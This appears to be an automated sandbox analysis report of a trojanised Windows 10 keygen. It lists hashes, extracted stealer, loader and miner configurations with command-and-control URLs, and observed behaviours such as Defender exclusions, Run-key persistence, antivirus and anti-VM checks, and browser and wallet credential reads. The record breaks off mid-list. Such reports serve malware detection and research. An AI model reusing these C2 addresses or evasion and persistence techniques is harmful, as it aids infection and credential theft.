Analysis
-
max time kernel
312s -
max time network
1787s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-03-2021 19:29
Static task
static1
Behavioral task
behavioral1
Sample
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
Resource
win7v20201028
General
-
Target
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
-
Size
4.9MB
-
MD5
bf3cefaa46337f7b6302961e8d460b5b
-
SHA1
586b9ee9680830e10a777e443c4bbe2bc356eda2
-
SHA256
ee75f4415becbb00d89e1527a1af07f1782130278443bfe04c072697270215f7
-
SHA512
4d0839c5d999d88958045024bc6a58e33b5660b62244e87eabbe5059ea4a17774f1734a34da5efc418e23dde427af9042035e43e4112cc4f1b5159a81db036ec
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/3468-361-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral4/memory/3468-362-0x00000000038E0000-0x000000000413D000-memory.dmp family_glupteba behavioral4/memory/3468-364-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5208 created 4208 5208 WerFault.exe loboydfybij.exe PID 4188 created 5348 4188 WerFault.exe fdrnjk1bsri.exe PID 6820 created 6936 6820 WerFault.exe axl4f0wpmpz.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
svchost.exedescription pid process target process PID 7944 created 3468 7944 svchost.exe app.exe PID 7944 created 5108 7944 svchost.exe setup.exe PID 7944 created 6264 7944 svchost.exe csrss.exe PID 7944 created 6264 7944 svchost.exe csrss.exe PID 7944 created 6264 7944 svchost.exe csrss.exe PID 7944 created 4292 7944 svchost.exe app.exe PID 7944 created 6264 7944 svchost.exe csrss.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 8008 bcdedit.exe 1460 bcdedit.exe 4108 bcdedit.exe 7384 bcdedit.exe 4580 bcdedit.exe 8184 bcdedit.exe 6096 bcdedit.exe 5708 bcdedit.exe 4020 bcdedit.exe 7364 bcdedit.exe 1124 bcdedit.exe 4836 bcdedit.exe 1752 bcdedit.exe 6840 bcdedit.exe 6132 bcdedit.exe -
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral4/memory/5096-177-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/5096-175-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5096-181-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5096-212-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 7 IoCs
Processes:
cmd.execmd.exepowershell.exepowershell.execmd.exeflow pid process 85 888 cmd.exe 87 888 cmd.exe 92 888 cmd.exe 304 7840 cmd.exe 337 4304 powershell.exe 338 5168 powershell.exe 643 7288 cmd.exe -
Drops file in Drivers directory 7 IoCs
Processes:
powershell.execsrss.exetimeout.exeDrvInst.exeHGT.exedescription ioc process File created C:\Windows\system32\drivers\VBoxDrv.sys powershell.exe File created C:\Windows\System32\drivers\Winmon.sys csrss.exe File opened for modification C:\Windows\system32\drivers\etc\hosts timeout.exe File opened for modification C:\Windows\System32\drivers\SET8E5.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET8E5.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts HGT.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exetaskkill.exekey.exemultitimer.exeaskinstall20.exefile.exemultitimer.exemultitimer.exeCDB6.tmp.exeCF6C.tmp.exeCDB6.tmp.execmd.exevict.exeaskinstall24.exeAwesomePoolU1.exeloboydfybij.exeonaqkq5mwmg.exeiohfq4l4pj4.exelgnex2kjd01.exeSetup3310.exevpn.exevict.tmpSetup3310.tmponaqkq5mwmg.tmpvpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmpapp.exewinlthst.exewimapi.exechrome_proxy.exe8590c1ec..exe1rexm2eyd4t.exemd2_2efs.exe1rexm2eyd4t.tmp9OZ13L0AA.exeSetup.exeSetup.tmpWerFault.exeXagdaNLKU.exe7za.exeXagdaNLKU.exeGDZ4y6rzJ.exeGDZ4y6rzJ.exeDelta.exeDelta.tmpSetup.exePictureLAb.exePictureLAb.tmpapp.exe7za.exeSetup.exeSetup.tmptimeout.exeapp.exehjjgaa.exeprolab.exePopelalowi.exeprolab.tmpjfiag3g_gg.exepid process 3660 keygen-pr.exe 1368 keygen-step-1.exe 832 keygen-step-3.exe 3932 keygen-step-4.exe 3136 key.exe 584 taskkill.exe 3996 key.exe 2924 multitimer.exe 2052 askinstall20.exe 2164 file.exe 2084 multitimer.exe 672 multitimer.exe 1636 CDB6.tmp.exe 1540 CF6C.tmp.exe 3916 CDB6.tmp.exe 888 cmd.exe 4136 vict.exe 4144 askinstall24.exe 4160 AwesomePoolU1.exe 4208 loboydfybij.exe 4200 onaqkq5mwmg.exe 4256 iohfq4l4pj4.exe 4284 lgnex2kjd01.exe 4348 Setup3310.exe 4420 vpn.exe 4436 vict.tmp 4524 Setup3310.tmp 4544 onaqkq5mwmg.tmp 4576 vpn.tmp 4848 IBInstaller_97039.exe 4904 IBInstaller_97039.tmp 4924 app.exe 5084 winlthst.exe 5104 wimapi.exe 4236 chrome_proxy.exe 5096 8590c1ec..exe 4680 1rexm2eyd4t.exe 4720 md2_2efs.exe 4668 1rexm2eyd4t.tmp 4812 9OZ13L0AA.exe 4140 Setup.exe 4844 Setup.tmp 5380 WerFault.exe 5628 XagdaNLKU.exe 5864 7za.exe 5856 XagdaNLKU.exe 5896 GDZ4y6rzJ.exe 5128 GDZ4y6rzJ.exe 5392 Delta.exe 5508 Delta.tmp 836 Setup.exe 4536 PictureLAb.exe 4388 PictureLAb.tmp 4128 app.exe 5248 7za.exe 6080 Setup.exe 4920 Setup.tmp 6012 timeout.exe 3468 app.exe 5640 hjjgaa.exe 5196 prolab.exe 5548 Popelalowi.exe 4888 prolab.tmp 4728 jfiag3g_gg.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule behavioral4/memory/6688-840-0x0000000000400000-0x0000000000897000-memory.dmp upx behavioral4/memory/420-1076-0x0000000000400000-0x0000000000C1C000-memory.dmp upx behavioral4/memory/1792-1080-0x0000000000400000-0x0000000000C1B000-memory.dmp upx behavioral4/memory/6872-1083-0x0000000000400000-0x00000000005E6000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exesetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setups.tmp1rexm2eyd4t.tmpsetups.tmpcmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation 1rexm2eyd4t.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 64 IoCs
Processes:
vict.tmpSetup3310.tmponaqkq5mwmg.tmpvpn.tmpIBInstaller_97039.tmp1rexm2eyd4t.tmpSetup.tmpapp.exeCF6C.tmp.exeDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemain.exeprivacytools5.exesetups.tmpsetup.exemask_svc.exevict.tmpSetup3310.tmpSetup.tmpapp.exeDelta.tmpPictureLAb.tmppatch.exeSetup.exepid process 4436 vict.tmp 4524 Setup3310.tmp 4524 Setup3310.tmp 4544 onaqkq5mwmg.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4904 IBInstaller_97039.tmp 4668 1rexm2eyd4t.tmp 4668 1rexm2eyd4t.tmp 4668 1rexm2eyd4t.tmp 4668 1rexm2eyd4t.tmp 4668 1rexm2eyd4t.tmp 4844 Setup.tmp 4844 Setup.tmp 4924 app.exe 1540 CF6C.tmp.exe 1540 CF6C.tmp.exe 1540 CF6C.tmp.exe 1540 CF6C.tmp.exe 1540 CF6C.tmp.exe 1540 CF6C.tmp.exe 5508 Delta.tmp 5508 Delta.tmp 4388 PictureLAb.tmp 4388 PictureLAb.tmp 4920 Setup.tmp 836 Setup.exe 836 Setup.exe 6472 main.exe 7404 privacytools5.exe 7040 setups.tmp 7040 setups.tmp 7040 setups.tmp 7040 setups.tmp 7040 setups.tmp 5636 setup.exe 7228 mask_svc.exe 7228 mask_svc.exe 7228 mask_svc.exe 7228 mask_svc.exe 7228 mask_svc.exe 7228 mask_svc.exe 7136 vict.tmp 5704 Setup3310.tmp 5704 Setup3310.tmp 4576 vpn.tmp 4576 vpn.tmp 6844 Setup.tmp 6844 Setup.tmp 5520 app.exe 6848 Delta.tmp 6848 Delta.tmp 3344 PictureLAb.tmp 3344 PictureLAb.tmp 6076 patch.exe 6076 patch.exe 6076 patch.exe 8144 Setup.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
app.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RestlessWater = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" app.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
1rexm2eyd4t.tmp9OZ13L0AA.exetimeout.exe2311699.25Conhost.execmd.exehjjgaa.exeapp.exereg.exemultitimer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\7079448 = "\"C:\\Users\\Admin\\AppData\\Roaming\\eyk0e3kpjuc\\1rexm2eyd4t.exe\" /VERYSILENT" 1rexm2eyd4t.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\BO1M4MJ6D3I4RU0 = "\"C:\\Program Files\\9OZ13L0AAW\\9OZ13L0AA.exe\"" 9OZ13L0AA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tewytileli.exe\"" timeout.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 2311699.25 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2mqfxadrzns = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RBB0U1V76O\\multitimer.exe\" 1 3.1616095912.6053aaa8c5a39" Conhost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\RestlessWater = "\"C:\\Windows\\rss\\csrss.exe\"" app.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\d2mwrhnkl3y = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\VFHCJZLXJ8\\multitimer.exe\" 1 3.1616096033.6053ab211c493" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\yusotwuvsjc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNKNRH41AY\\multitimer.exe\" 1 3.1616095784.6053aa2870069" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exemd7_7dfj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 17 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 54 api.ipify.org 208 ip-api.com 453 ipinfo.io 649 checkip.amazonaws.com 182 ipinfo.io 325 checkip.amazonaws.com 440 ipinfo.io 679 ipinfo.io 96 ipinfo.io 174 ipinfo.io 682 ipinfo.io 101 ipinfo.io 155 checkip.amazonaws.com 166 api.ipify.org 358 ipinfo.io 362 ipinfo.io 523 ip-api.com -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exemultitimer.exemultitimer.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe -
Drops file in System32 directory 24 IoCs
Processes:
powershell.exeLSujfCV.exeDrvInst.exeDrvInst.exesetup.exetapinstall.exepowershell.exesetup.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LSujfCV.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4AF.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4AF.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4B0.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File created C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4C1.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini LSujfCV.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4C1.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4B0.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
mask_svc.exeparse.exeConhost.exeparse.exemask_svc.exemask_svc.exepid process 4804 mask_svc.exe 7612 parse.exe 6456 Conhost.exe 1292 parse.exe 7612 parse.exe 6456 Conhost.exe 1292 parse.exe 5900 mask_svc.exe 7612 parse.exe 6456 Conhost.exe 1292 parse.exe 7228 mask_svc.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
